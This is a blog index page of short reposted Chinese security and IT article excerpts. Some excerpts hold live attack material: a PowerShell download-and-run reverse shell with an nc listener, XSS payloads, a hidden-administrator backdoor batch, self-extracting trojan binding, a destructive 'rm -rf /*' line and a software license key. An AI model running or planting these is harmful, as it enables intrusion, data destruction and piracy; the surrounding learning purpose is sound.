abg49988-CSDN博客

转载 Windows 10 Manager v2.3.3

Windows 10 Manager 是专门用于微软 Windows10 的集所有功能于一身的实用工具，它包括了40多个不同的实用程序来优化、调整、清理、加快和修复您的 Windows 10，可以让你的系统执行速度更快，消除系统故障，提高稳定性和安全性，个性化您的 Windows 10，它能满足您的所有期望。下载链接：https://pan.baidu.com/s/1XeNCQWu6...

2018-09-13 22:47:00 446

转载 Jupyter/JupyterLab安装使用

一.介绍Jupyther notebook（曾经的Ipython notebook），是一个可以把代码、图像、注释、公式和作图集于一处，实现可读性及可视化分析的工具，支持多种编程语言。官方使用手册。安装前，你需要装好python环境，并且安装pip包管理器。二. 安装使用pip安装jupyter notebookPython2pip install --upgrade pip...

2018-06-11 09:01:00 1151

转载 WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析

漏洞信息WordPress 是一种使用 PHP 语言开发的博客平台，用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统（CMS）来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞，攻击者只需巧妙地构造出一个恶意邮箱地址...

2018-04-20 19:48:00 836

转载 linux下pppoe连接管理

一、安装pppoe组件sudo apt-get install pppoe pppoeconf二、配置pppoe图形界面配置pppoe，在terminal里输入nm-connection-editor然后就会弹出图形界面让你配置网络，只要新建一个DSL连接即可。填好用户名密码，服务不用填，然后去有线网络那里连接。命令行界面配置pppo...

2018-03-24 14:54:00 233

转载 SQL注入学习资料总结

转载自：https://bbs.ichunqiu.com/thread-12105-1-1.html什么是SQL注入SQL注入基本介绍结构化查询语言（StructuredQuery Language，缩写：SQL），是一种特殊的编程语言，用于数据库中的标准数据查询语言。1986年10月，美国国家标准学会对SQL进行规范后，以此作为关系式数据库管理系统的标准语言（...

2018-03-13 11:51:00 239

转载 Win10添加右键在此处打开命令行

通过添加注册表项,实现右击“在此处打开命令行功能”注册表位置：HKEY_CLASSES_ROOT\Directory\Background\shell\win10系统用标识右键菜单打开命令行的键，键值639bc8（十六进制）：ShowBasedOnVelocityId（显示标识）HideBasedOnVelocityId（隐藏标识）效果　　直接右键即可看到该...

2018-03-09 21:32:00 539

转载 2018铁三测评题write以及一些想送给你们的话

一.、前言　　此文献给实验室的萌新们，以及刚刚接触CTF的同学们，希望能对你们的成长起到一些帮助。二、关于CTF　　可能你已经接触过CTF或者对它有所了解，这里我再简单介绍一下。1.什么是CTF？　　CTF（Capture The Flag）中文一般译作夺旗赛，是网络安全技术人员之间进行技术竞技的一种比赛形式，起源于1996年DEFCON全球黑客大会，以比赛形...

2018-01-30 20:01:00 316

转载 GPG

一、什么是GPG　　要了解什么是GPG，就要先了解PGP。　　1991年，程序员Phil Zimmermann为了避开政府监视，开发了加密软件PGP。这个软件非常好用，迅速流传开来，成了许多程序员的必备工具。但是，它是商业软件，不能自由使用。所以，自由软件基金会决定，开发一个PGP的替代品，取名为GnuPG。这就是GPG的由来。　　GPG有许多用途，本文主要介绍文件加...

2018-01-30 18:54:00 147

转载认识浏览器请求头User-Agent

一.定义　　User Agent中文名为用户代理，是Http协议中的一部分，属于头域的组成部分，User Agent也简称UA。　　它是一个特殊字符串头，是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识，用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计；例如用手机访问谷歌和电脑访问是不一样的，这...

2018-01-30 18:15:00 193

转载构建基于Suricata+Splunk的IDS入侵检测系统

一.什么是IDS和IPS？IDS(Intrusion Detection Systems)：入侵检测系统，是一种网络安全设备或应用软件，可以依照一定的安全策略，对网络、系统的运行状况进行监视，尽可能发现各种攻击企图、攻击行为或者攻击结果，并发出安全警报。IPS(Intrusion Prevention System)：入侵防御系统，除了具有IDS的监控检测功能之外，可以深度感知检测数...

2017-12-12 17:34:00 804

转载 iptables转发技术

NAT一. 什么是 NATNAT（Network Address Translation）译为网络地址转换。通常路由器在转发我们的数据包时，仅仅会将源MAC地址换成自己的MAC地址，但是NAT技术可以修改数据包的源地址、目的地址以及源端口、目的端口等信息。二. NAT的作用NAT技术最常见的应用就是通过修改源IP地址实现内网多主机使用一个公网地址接入互联网。NAT技术通常用于端口...

2017-11-24 13:45:00 233

转载博客园html测试

一.简介（h1）　　h1标签测试部分1. 二级标题1（h2）　　h2标签测试主内容。hello,it is a test.2. 二级标题2（h2）　　主内容有色文字3. 代码框类型1（有行号）1 test1 linux abcd2 rm -rf /*4.代码框类型1（无行号）python -m SimpleHTTPServer...

2017-11-11 10:20:00 98

转载 60cms Cookies欺骗漏洞审计

源码地址：https://files.cnblogs.com/files/ssooking/60cms.zip运行60cms目录下的Netbox.exe即可开启Asp Web服务，默认端口80环境搭建完毕之后即可访问主页1.漏洞分析首先，我们分析 login.asp　　在admin目录下找到login.asp，可以发现登录页面的两个Cookies字段...

2017-10-12 20:10:00 124

转载 CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

本文首发安全客，未经允许禁止转载。原文链接一. 前言　　随着CTF的普及，比赛的形式也有了越来越多的花样，对于线下赛来说，开始出现了安全加固或者防御战之类的环节，亦或者因为拿下靶机后不希望其他攻击者进入而进行“争夺”，无论什么形式，这些都需要我们对于服务器的防护工作有所了解。对于线下赛，笔者虽说没有什么很高超的攻防技巧，但也是有着一些自己的心得。本文总结了一些CTF线下赛中常用的...

2017-10-11 16:29:00 623

转载攻击流量的清洗

总结自：微信公众号“网络安全每日说”简介　　流量清洗是指在全部的网络流量中区分出正常流量和恶意流量，将恶意流量阻断和丢弃，而只将正常的流量交付给服务器。与其他的网络安全检测和防护手段类似，流量清洗也需要考虑漏报率和误报率的问题。通常，漏报率和误报率是一对矛盾，需要通过对检测和防护规则的调整来进行平衡。如果流量清洗的漏报率太高，就会有大量的攻击请求穿透流量清洗设备，如果无...

2017-10-11 15:22:00 265

转载拒绝服务攻击的常见类型

一. 什么是 DoS & DDoS ？　　拒绝服务攻击(Denial-of-Service Attack)亦称洪水攻击，是一种网络攻击手法，其目的在于使目标电脑的网络或系统资源耗尽，使服务暂时中断或停止，导致其正常用户无法访问。　　分布式拒绝服务攻击(Distributed Denial-of-Service Attack)，是使用网络上两个或两个以上被攻陷的电脑作为 “...

2017-09-26 22:54:00 2531

转载 Matlab信号处理基础

一. 简介　　离散傅立叶、离散余弦和离散小波变换是图像、音频信号常用基础操作，时域信号转换到不同变换域以后，会导致不同程度的能量集中，信息隐藏利用这个原理在变换域选择适当位置系数进行修改，嵌入信息，并确保图像、音频信号经处理后感官质量无明显变化。二. 数学公式一维离散傅立叶变换对定义一维离散傅里叶变换：一维离散傅里叶逆变换：一维离散余弦变换对定义一维离...

2017-09-17 16:04:00 765

转载 python实现类似于Matlab中的magic函数

参考这篇文章的代码封装了一个类似Matlab中的magic函数，用来生成魔方矩阵。#!/usr/bin/env python# -*- coding: utf-8 -*-import numpy as npdef magic(n): row,col=0,n//2 magic=[] for i in range(n): ...

2017-09-10 20:55:00 335

转载 MATLAB基础函数命令

1. 常用命令dir：列出当前目录下的所有文件clc：清除命令窗clear all：清除环境（从内存中清除所有变量）who：将内存中的当前变量以简单形式列出close all: 关闭所有的 Figure 窗口2. 变量设置(1).变量命名MATLAB 的变量名以字母打头，后最多可跟 19 个字母或数字，如 x,y,ae3和d3er45 等都是合法的变量...

2017-09-05 14:53:00 723

转载 Get shell By Powershell

Invoke-PowerShellTcp.ps1监听主机：nc -nv -l -p 9999powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Sh...

2017-08-30 15:12:00 228

转载 rdesktop使用记录

常用命令连接远程windows RDP服务器，映射本机/home/ssooking/share/目录到windows上，名称为Myshare。rdesktop -a 16 -u xxx -p xxx -r clipboard:PRIMARYCLIPBOARD -r disk:Myshare=/home/ssooking/share 192.168.20.116:8080参数...

2017-07-07 21:14:00 247

转载利用BeEF REST API自动化控制僵尸主机

本文首发Freebuf，属于原创奖励计划，未经许可禁止转载。http://www.freebuf.com/articles/network/137662.html一. 前言　　关于BeEF，不再多介绍，它的强大毋庸置疑，利用它我们可以做很多事情。最近的一些实验，需要用beef批量自动进行控制，发现网上也没有过多关于这方面内容的介绍，于是学习了一下它的API，...

2017-06-28 20:42:00 353

转载实验一、静态路由实验

实验要求1、掌握路由器的基本配置,几种工作模式的进入退出方法。2、掌握静态路由的作用和配置方法。3、掌握浮动路由的配置方法。4、掌握配置静态负载均衡的方法。5、掌握路由器上配置远程登录的方法。R4，R5，R6分别模拟主机：PC1，PC2，PC3路由器配置1. R1R1(config)#int f0/0R1(config-if)#ip add ...

2017-05-13 14:56:00 1057

转载利用pentestbox打造ms17-010移动"杀器"

本文首发Freebuf，属原创奖励计划，未经许可禁止转载。链接：http://www.freebuf.com/articles/system/132274.html一. 前言　　前段时间Shadow Broker披露了 Windows大量漏洞，甚至爆出黑客组织 Equation Group 对于Windows 远程漏洞 MS17-010 的利用工具，该漏洞影响范围之广，堪称杀...

2017-04-18 20:05:00 265

转载 XSS测试代码

无script的Xss<img/src=# onerror=alert('XSS')>HTML5 XSS测试代码<video> <source onerror=”javascript:alert(1)”>引入媒体类测试代码Example:<video onerror=”javascript:alert...

2017-03-27 09:09:00 345

转载 sublime Text3基本配置记录+python

环境：ubuntu内容：基本配置+python开发实用插件一. 激活注册码Michael BarnesSingle User LicenseEA7E-8213858A353C41 872A0D5C DF9B2950 AFF6F667C458EA6D 8EA3C286 98D1D650 131A97ABAA919AEC EF20E143 B361B1...

2017-03-27 09:06:00 107

转载 CTF中那些脑洞大开的编码和加密

原文：http://www.tuicool.com/articles/2E3INnmhttp://www.secbox.cn/hacker/ctf/8078.html0x01 目录常见编码:ASCII编码Base64/32/16编码shellcode编码Quoted-printable编码XXencode编码UUencode编码...

2017-03-16 15:55:00 883

转载信息安全相关资源

渗透测试资源Metasploit Unleashed链接地址- 免费攻防安全metasploita课程PTES链接地址- 渗透测试执行标准OWASP链接地址- 开源Web应用安全项目Shellcode开发：Shellcode Tutorials链接地址- 如何写shellcode的指导Shellcode Examples链接地址- Shellcode数据库社会工程...

2017-03-14 13:21:00 143

转载 RIP 实验

实验要求1. 理解 RIP 协议的工作原理2. 理解 RIPv1、RIPv2 的特性3. 掌握 RIP 协议的基本配置方法4. 掌握 RIP 自动汇总和手动汇总的方法5. 掌握 RIP 配置默认路由的方法6. 掌握 RIP 认证的基本配置7. 实验工具：GNS3实验拓扑实验过程接口配置R1 配置int loopback 0ip a...

2017-03-12 13:27:00 579

转载 python输出有色记录

一.第三方模块coloredlogs# Create a logger object.import logginglogger = logging.getLogger('your-module')# Initialize coloredlogs.import coloredlogscoloredlogs.install(level='DEBUG')...

2017-03-08 12:48:00 167

转载 mysql使用问题记录

Mysql Access denied for user 'root'ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)解决方法：更改root密码原密码为空，更改root密码# service mysql stop# mysqld_safe...

2017-02-10 12:09:00 76

转载 Cobalt Strike DNS通讯实例

一．域名设置　　如果没有域名，可以参考另一篇博客，申请Freenom免费域名，并使用DNSPod解析　　链接：https://www.cnblogs.com/ssooking/p/6364639.html　　首先我们要有个域名，然后创建一条A记录指向我们的cobaltstrike服务器，然后再创建2个或3个ns记录指向刚才创建的A记录。举例：比如我的域名是：ab...

2017-02-04 16:17:00 256

转载使用DNSPod解析Freenom域名

注册Freenom域名Freenom官网：http://www.freenom.comFreenom提供的顶级域名包括：tk，ml，ga，cf，gq申请流程：注册用户后登陆，然后查询并选择一个域名根据提示注册现在我们已经拥有自己的顶级域名了，可以在MyDomains查看利用DNSPod进行解析首先注册DNSPod账号，然后进入管理中心，...

2017-02-04 12:25:00 1603

转载 linux服务器ssh防爆破

查看爆破次数记录# cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort | uniq -c | awk '{print $2" = "$1;}'更改ssh默认端口修改SSH服务器配置文件# vim /etc/ssh/sshd_configssh连接时需指定连接端口，如：ssh -...

2017-02-03 16:21:00 351

转载 PentesterLab渗透演练平台

转载自：https://www.blackh4t.org/archives/1143.htmlhttp://www.91ri.org/5958.html1、什么是WebApp PentestingWebApp Pentesting，由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安...

2017-02-03 14:14:00 220

转载 JavaScript反向shell

Node.js反向Shell摘自：http://www.itfang.net/?p=109如下的Javascript就是一个Node.js的反向连接shell。这个payload将会生成一个/bin/sh的shell，创建一个TCP连接到攻击者的服务器，并且在通信数据流中绑定shell命令。(function(){ var net = require("ne...

2017-02-02 11:40:00 193

转载 PHP Backdoor + Reverse Shell on Vulnerable Website

翻译总结自：https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/扫描Web服务器，爆破常见目录dirb http://xxxxxxxxproxychains curl -X OPTIONS -vhttp://X.X.X.X/test/上面的请求应该是 ...

2017-02-01 20:08:00 339

转载蓝桥杯题目 — 第六届

1.三角形面积如【图1】所示。图中的所有小方格面积都是1。那么，图中的三角形面积应该是多少呢？请填写三角形的面积。不要填写任何多余内容或说明性文字。割补法：282 .立方变自身观察下面的现象,某个数字的立方，按位累加仍然等于自身。1^3 = 1 8^3 = 512 　　　5+1+2=817^3 = 4913 　　 4+9+1+3=17...请你计算包括...

2017-02-01 17:12:00 88

转载 windows后门

原文：揭秘Windows系统的四个后门组策略欺骗后门创建一个批处理文件add.bat，内容是：@echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit(2)利用　　上传运行gpedit.msc，定位到“计算机配置一>Windows设...

2017-01-29 18:13:00 152

转载压缩文件木马

rar自解压绑马(1)先用winrar压缩加密文件。压缩后的文件可改为任意后缀名,如.jpg (2)然后将unrar和加密压缩的文件打包成自解压文件。在"提取后运行"里填上"unrar e -p111111 calc.jpg"然后回车再输入解压后的exe文件名,如calc.exe. (3)打包后的自解压脚本命令就是 Setup=unrar e -p111111 calc.jp...

2017-01-22 09:51:00 500

空空如也

空空如也